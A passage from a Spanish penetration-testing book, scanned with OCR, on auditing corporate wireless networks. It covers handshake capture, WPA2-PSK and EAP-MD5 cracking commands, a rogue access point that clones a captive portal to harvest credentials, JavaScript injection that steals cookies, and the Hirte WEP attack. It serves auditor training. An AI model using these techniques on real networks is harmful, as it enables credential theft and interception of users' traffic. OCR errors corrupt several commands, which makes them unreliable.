esta  un  nuinero  alto  de  pantos  de  acceso.  Se  debe  estudiar  la  altemancia  de  canales  entre  los  puntos 
de  acceso  que  se  reparten,  ya  que  es  recomendable  que  entre  puntos  de  acceso  cercanos  se  utilicen 
distintos  canales  no  cercanos. 

Como  se  ha  mencionado  anterionnente,  el  auditor  puede  descubrir  redes  a  las  que  los  clientes 
wireless  se  conectan  o  han  conectado.  Esta  informacion  podria  ser  utilizada  en  ataques  de  Rogue  AP 
a  posteriori. 


A  continuacion  se  presenta  una  labia,  a  modo  de  ejemplo,  que  se  debe  rellenar  con  la  informacion 
que  el  auditor  va  encontrando  en  su  ''paseo  por  la  organizacion. 


BSSID 

MAC  Cliente  asociado 

Historial  SSID  (probes) 

No  asociado 

A 1  :A2:A  5:  CA  :FE:FE 

Flu,  WLAN AA.  starba 

No  asociado 

AA:BB:CC:1]:22:33 

Ginmasio,  default,  Android^iSDF, 
cc  xanadu,  ccj'actoiy 

CA:FE:CA:FE:CA:FE 

FE:FE:FE:CA:CA:CA 

Freewifi,  casajuayor,  hotel_zurba 

Tabla  3.04;  Ejemplo  de  dates  de  clienles  conectados. 


Wifite 

Una  de  las  heiTamientas  que  puede  ayudar  al  auditor  en  este  tipo  de  auditorias,  y  que  tiene  un  uso 
muy  sencillo  es  Wifite.  Esta  heiTamienta  desaiTollada  en  python  permite  automatizar  bastante  e 
proceso  de  auditoria  de  redes  wireless. 

Wifite  pennite  realizar  un  escaneo  del  entomo  de  manera  sencilla,  ya  que  incluso  es  el  piopio  sciipt 
el  que  realiza  la  configuracion  del  modo  monitor  de  la  tarjeta  y  lanza  el  escaneo.  Los  datos  que  se 
obtienen  en  el  escaneo  son  similares  a  los  que  se  saca  con  airodump-ng,  la  cual  se  ha  menciona  o 
anteriormente. 
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PoC:  Analisis  de  seguridad  en  la  red 

Una  vez  se  ha  recogido  la  informacion  sobre  las  redes  de  la  organizacidn  se  debera  evaluar  la 
configuracion  y  seguridad  de  los  protocolos  que  protegen  la  red  inalambrica.  Ademas,  el  seguimiento 
de  la  metodologi'a  OWJSAM  puede  ayudar  bastante  al  auditor  en  sus  primeras  auditorias  wire/exs. 
Es  cierto,  que  como  se  ha  comentado  anteriormente,  este  tipo  de  auditorias  son  procedimentales  en 
LI  11  alto  porcentaje. 

El  auditor  debe  establecer  un  maximo  de  seguridad,  en  fiincion  de  varias  circunstancias: 

La  maxima  seguridad  conocida  para  redes  inalainbricas. 

-  El  nivel  de  seguridad  en  la  que  se  encuentran  las  redes  wireless  de  la  organizacion. 

-  Evaluar  y  comparar  los  niveles  y  dictaminar  la  diferencia  entre  estos  niveles.  Si  la 
diferencia  supone  un  riesgo  no  aceptable  por  la  organizacion  se  debera  informar  como  ries<»o 
alto. 

Se  debe  tener  en  cuenta  la  funcion  de  cada  red  auditada,  ya  que  en  liincion  de  esto  el  nivel 
de  criticidad  cambia. 

Para  ejemplificar  esta  prueba  de  concepto  se  propone  un  escenario  como  es  el  siguiente: 

Existen  3  redes  wireless  en  la  organizacion. 

-  La  primera  red  inalambrica  tiene  como  nonibre  hmtados.  Esta  red  no  tiene  cifrado.  se 
replica  por  varios  puntos  de  acceso  con  intensidad  alta. 

-  La  segunda  red  inalambrica  tiene  como  nombre  ope  radora.  Esta  red  dispone  de  un 
cifrado  WPA2-PSK,  sin  soporte  de  protocolo  WPS. 

-  La  tercera  red  inalambrica  tiene  como  nombre  segura.  Esta  red  dispone  de  un  cifrado 
WPA2  Enterprise.  La  autenticacion  es  de  tipo  EAP-MD5. 

La  red  de  invitados 

El  primer  caso  es  una  red  de  invitados  que  se  suelen  implantar  en  empresas  para  dar  Internet  a  los 
clientes  o  negocios  que  la  empresa  pueda  tener.  Este  tipo  de  redes  necesitan  de  un  acceso  rapido 
y  no  complejo  para  que  los  clienles  o  invitados  no  se  quejen,  es  el  dilema  de  seguridad  contra 
productividad.  Se  sabe  que  se  debe  buscar  un  equilibrio,  y  que  tambien  el  no  ser  una  red  indispensable 
0  de  trafico  impoitante  hace  que  su  seguridad  sea  menor. 

La  red  debe  implantar  un  acceso  a  traves  de  un  portal,  aunque  no  haya  usuarios,  y  se  debe  registrar 
mfomiacion  sobre  quienes  acceden,  esto  serla  lo  ideal.  Ademas,  deben'a  haber  un  display  que 
mostrase  que  la  red  es  de  tipo  abierto  y  aconsejar  que  no  se  llevara  a  cabo  ninguna  operacion  crltica 

por  parte  del  usuario,  incluso  ejemplificando.  El  display  es  solicitado  por  temas  burocraticos  o 
iegales. 

Por  otro  lado,  cuando  el  usuario  accede  al  portal  donde  se  da  acceso  a  Internet,  algo  muy  comun 
es  encontrarse  el  certificado  auto  firmado,  provocando  el  eiTor  en  el  navegador.  ^Que  supone  esto? 
os  usuarios  se  acostumbran  a  estos  hechos,  por  lo  que  dan  por  normal  y^no  peligroso  esta  accidn. 
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El  auditor  puede  ulilizar  este  hecho  para  que  ciiando  realice  la  prueba  de  Rogue  AF,  el  usuario 
introduzca  sus  credenciales  en  el  portal,  y  no  sospeche  del  certificado.  Hay  que  recordar  que  en  la 
prueba  del  Rogue  AP  se  debe  copiar  todo  el  entorno  real,  para  quo  el  usuano  piense  que  accede  a 
traves  de  un  panto  de  acceso  legi'timo. 

Un  ejemplo  curioso  seria  ir  fliera  de  la  organizacion  y  obtener  la  senal  de  la  red  de  invitados  y  poder 
capturar  trafico  de  la  red  sin  necesidad  de  conectarse  a  la  red.  ^Que  se  pretende  con  esto?  Indicar  que 
no  existe  cifrado  y  que  cualquiera  desde  fuera  puede  acceder  a  la  red  de  los  invitados  y  visualizar 
los  paquetes  y  comunicaciones  de  los  usuarios  de  la  red,  por  lo  que  su  privacidad  desde  fuera  de  la 
organizacion  no  existe  a  traves  de  la  red.  La  configuracion  de  la  red  esta  dejando  en  manos  de  los 
protocolos  que  utilicen  los  usuarios  su  seguridad,  lo  cual  no  es  un  buen  habito. 

Es  un  tema  dificil  porque  las  empresas  lo  saben,  pero  es  mas  sencillo  configurar  una  red  con  el 
display  y  despreocuparse  que  montar  un  sistema  mas  seguro.  Habria  que  evaluar  si  los  empleados  no 
utilizan  esa  red,  ya  que  en  caso  de  utilizarla  podrian  poner  en  peligro  informacion  de  la  orpnizacion. 
Tambien  hay  que  evaluar  que  desde  esa  red  no  se  pueda  acceder  a  otra  red  con  mayor  pnvilegio  o  a 
activos  que  se  encuentren  en  otras  redes.  Es  decir,  hay  que  verificar  que  la  red  se  encuentra  aislada 
realmente  y  no  exislen  eiTores  de  configuracion. 


;No  hace  falta  conectarse  al  punto  de  acceso  de  la  red  de  invitados?  La  respuesta  es  no.  Si  el  auditoi 
se  conecta  podra  realizar  otras  tecnicas  mas  activas  de  ataque,  pero  si  el  auditor  no  quiere  dcjar 
huella  en  la  captura  de  trafico,  simplemente  debe  conectar  su  adaptador  wireless  en  modo  monitor 
y  “escuchar  el  aire".  Esta  accion  se  puede  llevar  a  cabo  con  airodtimp-ng  de  manera  sencilla  con 
el  parametro  -iv  <nombre  defichero>.  La  instruccion  completa  seria,  por  ejemplo,  airodump-ng  -w 
<fichero  CAP>  monO.  _ 
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La  red  WPA/WPA2  con  PSK 

En  el  caso  del  analisis  de  seguridad  de  la  segunda  red,  la  de  tipo  WPA2-PSK.  denominada  ope^ 
radora,  se  tiene  que  tener  en  cuenta  si  la  red  dispone  de  WPS,  algo  que  no  seria  normal  en  un  entomo 
de  empresa.  Este  tipo  de  redes  con  autenticacion  PSK,  no  suele  encontrarse  en  ambitos  profesiona  es, 
pero  es  cierto  que  algunas  empresas  las  usan  como  redes  intermedias.  En  otras  palabras,  1^ 
empleados  que  no  manejan  informacion  sensible  para  realizar  tareas  comunes  o  del  dia  a  dia  y  que 
no  requieren  un  alto  grado  de  seguridad.  ^Esto  es  debatible?  Por  supuesto,  pero  es  cierto  que  algunas 
empresas  las  utilizan.  ^Son  seguras?  Lo  son,  tanto  como  lo  sea  su  contrasena. 

Cuando  un  auditor  se  encuentra  este  tipo  de  redes,  y  suponiendo  que  no  tiene  WPS,  sabe  que  el 
tiempo  de  crackeo  para  estas  redes  es  muy  alto,  por  lo  que  se  tiende  a  optar  por  auditar  otras  redes. 
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En  algunas  ocasiones  se  ban  dado  casos  en  los  que  la  contrasena  no  era  todo  lo  compleja  que  se 
debiera,  y  con  un  ataque  de  diccionario  se  hubiera  conseguido  la  clave,  lo  cual  habria  demostrado 
que  la  red  no  era  segura. 

Si  la  clave  se  encuentra  en  un  diccionario,  es  un  eiTor  de  configuracion  impoitanle,  y  si  la  clave  se 
puede  sacar  por  fuerza  bruta  en  un  tiempo  bajo,  tambien  se  consideraria  un  etror  de  configuracion 
importante.  Es  cierto  que  WPA2-PSK  puede  echar  para  atras  al  auditor  a  la  hora  de  analizarla  clave, 
pero  se  debe  realizar  porque  siempre  piieden  existir  las  sorpresas.  Si  existe  WPS  se  puede  utilizar 
herramientas  como  reaver  y  poder  intentar  obtener  la  credencial  en  menos  de  un  dia.  Disponer  de 
una  red  wireless  en  un  entomo  profesional  con  WPS  seria  un  fallo  de  seguridad,  ya  que  esto  puede 
comprometer  la  seguridad  de  la  red. 

Conseguii  el  handshake  de  esta  red  es  algo  trivial,  que  el  propio  airodump-ng  y  otros  cientos  de 
herramientas  de  auditoria  wireless  pueden  lograr.  Se  conseguira  de  manera  rapida  debido  a  que 
habra  muchos  usuarios  conectandose  y  desconectandose  de  la  red  a  lo  largo  del  dia.  De  todos  modos, 
siempre  se  puede  forzar  la  desconexion  de  algiiin  cliente  con  aireplay-ng. 
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Fig.  3.67:  Captura  del  handshake. 


Se  podrian  utilizar  distintas  tecnicas  para  llevar  a  cabo  el  crackeo  del  handshake,  ataques  por  GPU, 
iitilizacion  de  airolib-ngpm-a  generacion  de  PMKs,  fuerza  bmta  o  diccionario  con  aircrack-ng. pyrii 
etcetera. 


La  red  Enterprise 

En  la  tercera  red  wireless  de  la  organizacion  denominada  segura^  se  tiene  un  cifrado  WPA  2 
Enterprise,  con  autenticacion  de  tipo  EAP-A^fD5.  Con  estos  dates  cl  auditor  ya  sabe  que  la  red  es 
vulnerable  a  ciertos  ataques,  los  cuales  pueden  llevar  tiempo. 

Se  ha  de  decir  que  este  tipo  de  configumcion  es  algo  inusual,  pero  que  para  soq^resa  de  mas  de  uno, 
aim  se  puede  encontrar  en  algunas  empresas.  Es  altamente  insegura,  aunque  al  final  el  tiempo  a 
utilizar  ira  en  ftincion  de  la  robustez  de  la  contrasena. 

La  configuracion  de  una  red  Enterprise  utiliza  un  segundo  servicio  de  autenticacion,  a  traves  de 
un  servidor  RADIUS,  el  cual  valida  cada  uno  de  los  distintos  usuarios  y  sus  contraseiias  utilizando 
extensiones  en  EAP,  Extensible  Authentication  Protocol,  como  en  este  caso  sera  MD5.  ^Como 
lunciona  realmente  esto?  La  verificacion  de  las  credenciales  del  usuario  se  realiza  mediante  un 
esafio.  En  primei  lugar  el  cliente  se  asocia  al  punto  de  acceso  y  se  identificara  con  el  nombre  de 
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usuario,  identity,  esta  infomiacion  se  pasa  al  RADIUS.  El  servidor  RADIUS  con^sta  al  cliente, 
a  traves  del  punto  de  acceso,  con  un  paquete,  el  cual  contiene  un  ID  de  la  peticion  y  un  desafio 
en  formato  hash  klDS  aleatorio.  For  ejemplificar  esto,  se  podria  decir  que  el  ID  es  22  y  el  hash 
7e4b64eb65e34fdfad79e623c44abd94.  El  cliente  debe  generar  un  hash  MD5  fonnado  por  el  ID, 
contrasena  y  desafio,  es  decir,  concatenando  esos  tres  valores.  Por  ultimo,  el  servidor  RADIUS 
realiza  la  misma  operativa,  ya  que  tambien  conoce  la  credencial  y  si  obtiene  el  mismo  hash,  la 
contrasena  sera  valida. 

;  Donde  esta  el  problema?  El  peligro  radica  en  que  todo  este  trafico  se  envia  a  traves  de  un  canal  no 
seguro,  es  decir,  en  texto  piano.  Con  una  capUira  de  como  se  conecta  un  cliente  permitiiia  generar  un 
ataque  de  diccionario  sobre  la  contrasena.  La  idea  es  generar  el  numero  de  hashes  MD5  necesarios 
para  obtener  el  que  envio  el  cliente  legitimo. 

Existen  dos  scripts  denominados  eapmdScrack  y  eapmdSpass  que  ayudaran  al  auditor  a  lealizar 
el  crackeo.  La  gente  de  Security  By  Default  ha  optimizado  y  participado  en  la  modificacion  de  los 
.scripts,  creando  eapmdShcgen.py,  el  cual  se  puede  encontrar  en  la  siguiente  direccion  URL  https:// 
code.google.com/p/shdtools/downloads/list,  para  que  realicen  la  comprobacion  de  un  numero 
elevado  de  contrasefias  en  un  breve  perlodo  de  tiempo.  Se  ayudan  de  hashcat  y  oclhashcat  para  el 
crackeo  de  contrasefias  mediante  CPU  o  GPU. 

Los  parametros  para  el  script  Ae  Alejandro  Ramos  son: 

-  -r  eap.rtile,  afiade  el  ID  del  paquete  al  inicio  de  cada  palabra.  Es  totalmente  necesario  para 
la  generacion  del  hash  final. 

-  —oiitfile-format  <valor>,  para  mostrar  el  resultado  en  hex. 

_  -hex-salt.,  se  le  indica  el  challenge  enviado  por  el  servidor  R.4DIUS. 

-  -m  <valor>,  indica  el  tipo  de  hash  y  formato  que  es. 

-  ToPwn,  fichero  que  contiene  el  haslr.salt. 

-  <ruta  diccionario>  directaniente  apunta  al  fichero  txt. 

PoC:  Rogue  AP  en  la  empresa 

En  esta  prueba  de  concepto  el  auditor  intenta  colocar  un  punto  de  acceso  falso  con  el  fin  de  que 
los  empleados  de  la  organizacion  se  conecten  a  este.  El  objetivo  final  es  que  el  punto  de  acceso 
que  el  auditor  configure  disponga  de  la  misma  configuracion  y  que  las  redes  inalambncas  que  se 
encuentran  en  la  organizacion. 

El  objetivo  principal  es  verificar  si  los  empleados  caerian  en  este  silencioso  ataque,  y  poder  capturar 
el  trafico.  (,Que  se  pretende?  Se  intenta  verificar  la  dificultad  que  supone  que  alguien  coloque  un 
punto  de  acceso  falso  y  consiga  que  los  empleados.  sin  saberlo,  se  conecten  a  este  punto  de  acceso 
falso  en  vez  de  a  los  dispositivos  reales. 

El  objetivo  de  esta  prueba  de  concepto  es  generar  un  phishing  del  portal  de  la  red  de  invitado^  Se 
suplantara  un  punto  de  acceso,  el  propio  de  la  red  de  invitados,  para  llevar  a  cabo  el  ataque.  A  na 
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se  conseguira  obtener  las  credenciales  de  algun  usuario.  Esas  credenciales,  en  algunos  casos  podrian 
servir  en  otras  fases,  como  por  ejemplo  la  auditoria  interna,  o  incluso  en  la  perimetral. 


VVir-rliev  ■ 

Wireless  Band 

IEEE802. 1  \ g  v- 

Mode 

Access  Point  v 

Wireless  Network  Name(SSID) 

Invitados 

SSID  Broadcast 

Enable  v 

Channel 

5 ^  2.422  GHz  —  Auto  Channel  Scan 

Authentication 

Open  System  v 

Fig.  3.68:  Configuracion  del  punto  de  acceso  con  la  configuracion  necesaria. 


Los  auditores  deben  configurar  en  el  punto  de  acceso  un  sei-vidor  DHCP,  el  cual  existe  en  el 
piopio  dispositivo.  El  DHCP  otorgara  la  puerta  de  enlace  a  los  equipos  que  se  conecten  al  punto  de 
acceso,  y  la  direccion  IP  que  se  otorgue  como  puerta  de  enlace  sera  la  de  una  de  las  maquinas  del 
auditor,  la  cual  hara  funciones  de  router.  De  este  modo,  todo  el  trafico  que  envien  los  clientes  que 
se  asocien  al  punto  de  acceso  falso  sera  enviado  a  traves  de  ese  equipo  hacia  Internet,  por  lo  que 
podra  ser  analizado  y  procesado.  Se  esta  realizando  un  MEMgracias  al  punto  de  acceso  falso  y  su 
configuracion.  La  autenticacion  es  abierla  y  no  hay  cifrado. 

Para  que  el  portal  caiitivo  que  dispone  la  red  de  invitados  sea  creible  hay  que  suplantarlo,  por  lo  que 
se  captura  la  web  original  y  se  copia  para  mantener  la  parte  visual  Intacta.  Hay  que  aclarar  ahuinas 
cosas  sobre  el  portal  cautivo:  ^ 

El  certificado  emitido  para  el  portal  no  es  considerado  de  confianza  por  los  navegadores, 
ya  que  es  auto  firmado.  y  su  identidad  no  puede  ser  verificada.  Esto  es  un  punto  a  favor  del 
equipo,  ya  que  permite  colocar  un  certificado  auto  finnado,  y  los  usuarios  que  entren  no 
notaran  ninguna  sensacion  extraha. 

El  certificado  de  seguridad  del  sitio  no  es  de  confianza. 

Has  tfjtenlado  acceder  a  1.1. 1.1  paro  el  sersidor  ba  pfeseniado  on  certificado  eml^do  oor  una  enida^d  cue  el 
sisterra  opefalr.-o  del  crden»dor  no  Irene  registrada  cemo  enltdad  de  confianza  Este  pfob’erra  se  pjede  decer 
a  cue  el  ser.idof  haya  generado  sus  prcpias  credenciales  de  segundad  ten  fas  que  Google  ChroTis  ipo  pgede 
p.-?ra  confirmer  la  aulenttcidad  del  sdio:  o  a  que  una  ce-rsona  esie  mtenlando  intercepfar  kis 
comumcaciones 

I  Jo  deSeria^  conlinuar  so4>rp  todo  si  no  Kas  recidido  nunca  esla  ad.^rtencia  para  es!e  siUo 
[  Conlinuar  de  todos  modes  [  Voh.«r  a  seguhdad 

►  Mas  infotrpacion 


Fig.  3.69:  Certificado  del  sitio  no  es  de  confianza. 
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-  El  codigo  fiiente  del  sitio  web  puede  presentar  instrucciones  comeniadas  o  comentarios 
de  los  desarrolladores.  Esto  hay  que  revisarlo,  ya  que  nunca  se  sabe  lo  que  se  puede  encontrar 
en  el  codigo  fiiente. 

Una  vez  realizada  la  copia  del  portal  cautivo  se  modifica  la  logica  de  la  web,  por  ejemplo  con 
tecnologi'a  PHP  si  se  decide  implanta  con  esta.  El  objetivo  de  modificar  la  logica  de  la  web  es  la 
de  capturar  infomiacion  de  los  visitantes  y  poder  almacenar  el  envio  del  formulario  de  acceso, 
guardando  todos  los  datos  introducidos. 

La  ruta  de  directorios  original  se  respeta  para  que  proporcione  una  sensacion  de  sitio  de  confianza 
al  Lisuario  victinm.  Ademas,  se  redirige  a  cualquier  sitio  web  que  el  portal  tuviera  configuiado  por 
defecto,  una  vez  introducidas  las  credenciales,  con  el  fin  de  otorgar  semejanza  a  la  victima. 

Se  tiene  que  tener  en  cuenta  que  en  el  punto  de  acceso  suplantado  se  establece  el  mismo  lango  de 
direcciones  IP  que  en  el  seginento  original,  para  que,  de  nuevo,  el  usuario  victima  no  sospeche  de 
su  entonio. 

Usuario 

Contrasena 

Acoptar 

Si  durante  su  estancia  o  visita  necesila  acceso  a  la  red,  pongase  en  contacto  con  el  administrador  de  la 

Fig.  3.70:  Portal  cuuiivo  suplantado. 


PoC:  Rogue  AP  inyectando  Javascript  botnet 

En  esta  prueba  de  concepto  la  idea  es  similar  a  la  anterior,  se  nionta  un  Rogue  AP  y  consigue  que 
el  usuario  se  conecte  al  punto  de  acceso  no  legi'timo.  El  objetivo  es  infectar  el  equipo  o  dispositivo 
movil  que  se  conecta  al  punto  de  acceso  con  un  fichero  Javascript  malicioso.  Si  se  quiere  que  el 
ataque  sea  transparente  para  el  usuario,  el  equipo  del  auditor  realizara  las  tareas  de  router,  y  enviara 
el  traflco  a  Internet.  De  nuevo  se  esta  realizando  un  MITM. 

i,Por  que  la  prueba  de  la  Javascript  BotneP.  Se  quiere  probar  la  actuacion  de  los  usuarios,  y  la 
viabilidad  para  poder  infectar  internamente  a  los  usuarios  y,  sobretodo,  sus  dispositivos  moviles.  ^En 
que  consiste?  Este  proceso  consiste  en  inyectar  codigo  Javascript  en  ficheros  licitos,  por  ejemplo 
ga.js.  que  la  victima  descarga  en  su  navegacion.  Para  ello  se  habilila  un  proxy  en  la  piopia  maquina 
del  auditor,  el  cual  se  encargara  de  anadir  este  codigo. 

Cuando  la  victima  haga  una  peticion  hacia  Internet  y  se  descargue  algiin  archivo  Javascript,  el  proxy 
realizara  la  modificacion  en  el  contenido  del  codigo  Javascript  afiadiendo  el  payload  paia  que  sc 
ejecute  junto  al  codigo  licito. 

Una  vez  el  fichero  "Js  "  infectado  o  modificado  con  el  codigo  •'malicioso  "  se  ejecuta  en  el  cliente. 
enviara  infonnacion  como  cookies,  datos  de  formulario,  etcetera.  Esta  informacion  sera  almacenada 
por  el  auditor  en  base  de  datos. 


Capitulo  111.  Confeccionando  el  atacjue 
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Fig.  3.7 1 :  Panel  de  control  de  la  Juvascripi  bolnei. 


Otras  PoC’s  posibles  en  distintos  entornos  Wireless 

Existen  muchas  configuraciones  posibles  en  entornos  wireless,  por  ello  se  debe  conocer  las  tecnicas 
que  se  pueden  utilizaren  cada  caso.  En  este  apartado  se  exponen  diferentes  tecnicas.  que  puedcn  ser 
de  valia  para  un  auditor  en  algunos  casos.  Algunas  de  las  situaciones  seran  extranas  de  encontrar. 
pero  nunca  .se  sabe  lo  que  un  auditor  puede  encontrar  en  su  dia  a  dia. 

En  la  pnmera  prueba  de  concepto  se  estudia  la  generacion  de  tablas  con  las  PMKs  ya  precalculadas. 
Es  una  opcion  mteresante,  aimque  solo  servira  para  las  redes  con  cl  mismo  SSID,  por  lo  que  no 
pioporciona  una  gran  ventaja  su  calculo.  La  red  wireless  a  la  que  el  auditor  se  enfrenta  es  de  lipo 
WPA2-PSK  y  el  escenario  es  el  siguiente; 

-  Cliente  asociado  al  punto  de  acceso,  al  cual  se  le  debera  capturar  el  hand.shake. 

-  Punto  dc  acceso  con  ESSID  visible. 

-  El  auditor  dispone  de  airolih-ng  con  la  que  generara  la  tabla  de  PAJKs  para  una  red 
concreta.  Esta  tabla  solo  se  podra  reutilizar  en  caso  de  enfrentarse  a  una  red  igual. 

La  tarjeta  inalambrica  debe  colocarse  en  modo  monitor  mediante  el  uso  de  la  aplicacion  airmon- 
La  herramienta  airodump-ng  permile  capturar  el  trafico  que  circula  por  el  aire,  entre  el  punto 
ce  acceso  y  cl  cliente  asociado.  El  principal  objetivo  en  esta  ocasion  es  capturar  el  handshake.  Se 
puede  utihzar  la  herramienta  aireplay-ng  para  llevar  un  ataque  de  desaulenticacion.  en  el  caso  dc 

que  ei  chente  ya  se  encuentre  asociado.  En  la  imagen  se  puede  obsciwar  como  se  realiza  la  captura 
del  handshake. 
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Fig.  3.72:  Captura  del  handshake. 
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Ahora  se  debe  crear  la  base  de  dates  en  la  que  se  obtendran  las  PMK.s  para  el  ESSID  que  se  elija  en 
este  case  el  de  la  red  en  particular.  La  herramienta  para  generar  esta  mformacion  sera  anohb-n^,, 
dial  tiene  algunas  restricciones. 

En  primer  lugar  el  fichero  con  los  ESSID.  ya  que  se  puede  aprovechar  la  tabla  para  generar  PMKs 
de  un  ESSID.  En  segundo  lugar,  el  fichero  con  las  palabras  que  pueden  ser  contrasena^es 
Tecrun  dtinario.  Se  debe^tener  claro  que  para  cada  ESSID  se  generara  una  tabla  con  las  PMKs 

precalculadas.  _ _ 

rSot@kaU;~#  airollb-ng  crackwpa  --import  passwd  /root/passwa.ix: 

Reading  file...  ^  .  , 

Writing... es  read,  36561  invalid  lines  ignored. 

Done .  . 

root(4kali: -#  echo  LaWR  >  /root/essid.txt  txt 

rootgkati:--#  airolib-ng  crackwpa  --import  essid  /root/essid.t 

Reading  file... 

Writing. . . 

Done . 

ruot@kali:-#  airolib-ng  crackwpa  - -stats  possible  combinations  have  been  comput 

There  are  1  ESSIDs  and  16  passwords  in  the  database.  U  out  or  lo  pu 

ed  (0%) . 

ESSID  Priority  Done 

LaWR  64  0-0 

rool^kalJ  :  -4  | _ _ _ _ 

Fig.  3.73:  Generacion  de  la  tabla  con  PMKs. 


root^kall:#  airolib-ng  crackwpa  --clean  all 
Deleting  invalid  ESSIDs  and  passwords... 

Deleting  unreferenced  PMKs... 

AnalvsinQ  index  structure. . . 

Vacuum-cleaning  the  database.  This  could  take  a  while... 

Checking  database  integrity... 

integrity_check 

ok 

Done.  u  4-  E, 

Su^fd'ieVMKTn' rsLon'ds  U6  PMK%!  O  in  buffer)  .  All  ESSID  processed. 

rootakali;  #  airolib-ng  crackwpa  --verify  all 
Checking  all  PMKs.  This  could  take  a  while... 

ESSID  PASSWORD _ PMK_DB  CORRECT _ _ _ 

Fig.  3.74:  Verificacion  dc  datos  en  la  tabla. 


Una  vez  se  dispone  de  la  informacion  en  la  tabla.  se  debe  utilizar  aircrack-ng  con  la  siguiente 
instruccion  aircrack-ng  -r  <fichero  base  cIatos>  <Jichero  captura>. 

En  h  se«unda  prueba  de  concepto  se  presenta  un  ataque  contra  el  protocolo  WEP,  basandose  en  un 
Ll  de  rccer^^  so  que  el  auditor  colocara.  El  ataque  se  denomina  Hirte.  En  nmgun  mom  n 
se  neclitHa  niteraccL  del  punto  de  acceso  verdadero  o  real.  En  el  punto  de  -ceso  false  . 
configurara  el  SSID  del  punto  de  acceso  original,  para  que  la  victima  lo  tenga  en  a  is  a 
almacenados  en  su  equipo.  De  este  mode  la  victima  se  conectara  ' 

para  despues  generar  trafico  legitimo  para  llevar  a  cabo  el  proceso  del  ciackeo  W  . 


Capitulo  III.  Confeccionando  el  ataque 


es  la  teoria?  Se  sabe  que  el  primer  campo  de  los  datos  cifrados  es  siempre  igual,  el  ciial  es  la 
cabecera  LLC\  que  ocupa  8  bytes,  y  se  sabe  cuales  son  esos  8  bytes.  De  este  modo,  si  sc  realiza  un 
XOR  de  los  primeros  8  bytes  del  paquete  capturado  con  los  8  bytes  de  la  cabecera  LLC  que  ya  se 
conocen,  se  obtienen  los  primeros  8  bytes  del  RC4  keystreuni. 


II 


RC4  Keystream 


8  Bytes 


Fig.  3.75:  Cabecera  LLC  XOR  con  dales  cifrados. 


/,0ue  se  puede  hacer?  Se  puede  realizar  un  XOR  con  un  paquete  que  se  cree  al  fragmentar  el  original, 
ese  paquete  sera  perfectamente  valido  para  la  red  original.  Este  hecho  vale  para  fragmentar  un 
paquete  ARP  y  despues  llevar  a  cabo  la  reinyeccion  de  paquetes 


Imagine  un  paquete  de  8  bytes  lormado  por  4  bytes  de  datos  y  4  bytes  de  ICV.  Al  realizar  el  XOR 
quedaria  un  paquete  cifrado  con  WEP,  en  el  que  hay  4  bytes  de  datos  cifrados  y  4  bytes  de  JCV.  tal 
y  como  se  puede  visualizar  en  la  imagen. 


RC4  Keystream 


4 


^  Iricrvfiteci 
_ Data 


4 


ICV 


Fig.  3.76:  Generacion  de  paqiielc  valido  en  ataque  hirte. 
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Esto  sirve  para  ataear  al  cliente,  ^Como?  Cuando  este  se  conecte  al  piinto  de  acceso,  despues  de 
enviar  los  primeros  paquetes  enviara  los  ARP  request,  sera  aqui  cuando  se  responda  con  iin  ARP 
reply. 

Para  crear  el  punto  de  acceso  falso  se  utiliza  la  hen'amienta  airbase-ng  con  la  siguiente  instmccion 
airhase-ng  ~c  <canal  a  emplear>  —essid  <nombre  jvd>  -  W 1  <interfaz  de  radio>  -N.  En  el  caso  de 
_\yy-]y  indican  que  el  protocolo  de  cifrado  es  WEP  y  que  se  realiza  el  ataque  hirte. 

Se  tendra  que  almacenar  la  captura  con  airodump-ng,  para  ello  se  ejecuta  la  siguiente  instruccion 
airodutnp-ng  -c  <ca}ial  a  esiichar>  -  W  <fichero  captura>  <mterfaz  de  radio>. 

En  la  captura  de  trafico  con  airodump-ng  se  podria  visualizar  como  los  paquetes  crecen  rapidamente, 
por  lo  que  la  inyeccion  de  paquetes  esta  fiincionando  bastante  bien,  Simplemente  toca  esperar  a 
alcanzar  un  numero  alto  de  paquetes  para  utilizar  aircrack-ng,  y  llevar  a  cabo  el  proceso  de  crackeo 
de  la  clave. 

La  instruccion  seria  aircrack-ng  <captura  de  trdfico>. 


PoC:  Conociendo  el  entorno  VOIP  de  la  organizacion 

Es  imporlante  conocer  el  entorno  que  rodea  al  puesto  donde  un  auditor  se  encontrara.  Todo  dato 
es  iinportante,  en  algunos  modelos  de  tclefonos  se  puede  encontrar  que  al  conectailos  a  la  led  se 
realizan  peticiones  HTTP.  Esto  puede  ser  visto,  simplemente,  en  el  display  del  propio  dispositive. 

Cuando  un  dispositive  VOIP  se  conecta  a  la  red  puede  ayudar  al  auditor  indicandole  a  donde  se  esta 
conectado,  como  se  ha  mencionado  anteriormente.  <;,Para  que  sir\^en  estas  peticiones?  En  algunos 
cases,  simplemente  ayudan  a  la  gestion  y  organizacion  de  los  telefonos  disponibles  en  la  red, 
indicandole  al  servidor  que  gestiona  todo  que  hay  un  telefono  nuevo  en  la  red. 

Las  peticiones  puedes  ser  esnifables,  por  lo  que  el  auditor  puede  estar  preparado  para  capturar  el 
trafico  en  esa  '‘boca  "  o  en  otra.  La  tematica  de  las  versiones  en  este  entorno  tiene  mucha  importancia, 
ya  que  si  a  traves  de  los  pequehos  detalles,  como  el  del  display,  se  pueden  sacar  las  versiones  de 
firmware  que  ejecuta  el  dispositivo,  o  algo  que  identifique  al  servidor,  mejor. 

PoC:  Recogida  de  informacion  y  evaluacion  de  seguridad 

Como  se  menciono  en  las  pniebas  tras  identificar  el  entomo  se  deben  realizar  varias  acciones: 

Busqueda  de  exploits  en  busca  de  fallos  de  seguridad  en  el  firmware  del  dispositivo. 

-  Testear  la  configuracion  de  los  tenninales. 

Realizar  una  captura  de  trafico.  Con  esto  se  comprobaran  varias  cosas,  pero  dos 
importantes,  como  se  llevan  a  cabo  las  comunicaciones,  cifradas  o  no  cifradas,  y  si  sin 
necesidad  de  realizar  M/IMla  red  se  comporta  como  hub.  La  informacion  que  puede  llegar 
al  auditor  sin  tener  que  hacerlo  puede  soiprender  a  mas  de  uno  en  una  auditoria. 
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tn  esta  prueba  de  concepto  se  propone  un  escenario  en  el  que  las  comunicaciones  no  van  cifradas 
y  lyed  se  comporta  como  si  fuera  un  huh.  Por  lo  que  tras  analizar  el  trafico  que  Ileaa  al  equipo  del 
auditor,  que  Simula  ser  un  dispositivo  VOIP  pero  que  en  realidad  es  un  sniffer,  se  puede  identificar 
lugas  de  informacion  dentro  de  la  red. 

fOue  tipo  de  lugas?  Lo  mas  grave  seria  el  poder  escuchar  infonuaciones,  sobre  todo  si  son  de  cargos 
